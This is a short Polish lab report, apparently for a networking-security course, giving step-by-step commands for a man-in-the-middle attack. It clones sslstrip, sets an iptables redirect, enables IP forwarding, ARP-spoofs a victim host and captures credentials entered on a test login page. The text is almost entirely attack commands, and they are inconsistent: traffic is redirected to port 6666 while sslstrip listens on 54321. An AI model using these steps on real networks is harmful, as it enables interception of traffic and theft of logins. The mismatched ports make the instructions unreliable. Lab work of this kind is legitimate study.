Aby wykonac zadanie 8 nalezy uzyc Python2
Aby to zrobic nalezy sklonowac repozytorium github umieszczonego pod adresem https://github.com/moxie0/sslstrip
Nastepnie utworzyc venv w wersji 2.7 - uzyto tutaj Pycharm i do tego srodowiska doinstalowano odpowiednie brakujace biblioteki.

1. Ponadto nalezy zmienic tablice IPTABLES aby przekierowac ruch na port wskazany w pozniejszym poleceniu sslstrip:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 6666

2. Nalezy ustawic przekierowanie ruchu przez maszyne z kali
echo 1 > /proc/sys/net/ipv4/ip_forward

3. Uruchomienie polecenia sslstrip:
/home/kali/PycharmProjects/sslstrip/venv/bin/python /home/kali/projekt2/sslstrip/sslstrip.py -l 54321 -a -w logssl5.txt
Parametry uruchomienia:
-l - nasluchiwanie na odpowienim porcie
-a - zapisywanie wszystkiego do pliku logow
-w logssl5.txt - zapisywanie informacji do pliku o nazwie logssl5.txt

4. Wywolujemy polecenie arpspoof aby przekierowac ruch z maszyny atakowanej przez maszyne z kali
arpspoof -i eth0 -t 10.0.2.5 -r 10.0.2.1

W przegladarce maszyny zaatakowanej wchodzimy na adres: http://testphp.vulnweb.com/login.php i podajemy przykladowe dane logowania
i w pliku, ktory tworzymy w poleceniu sslstrip uzyskujemy dane logowania, ktore podalismy wczesniej.
[logssl5.txt](logssl5.txt) jak rowniez zapisana strona ktora byla odwiedzona
Bez przelacznika -a w poleceniu sslstrip mozna uzyskac dane jak w pliku [logssl4.txt](logssl4.txt)


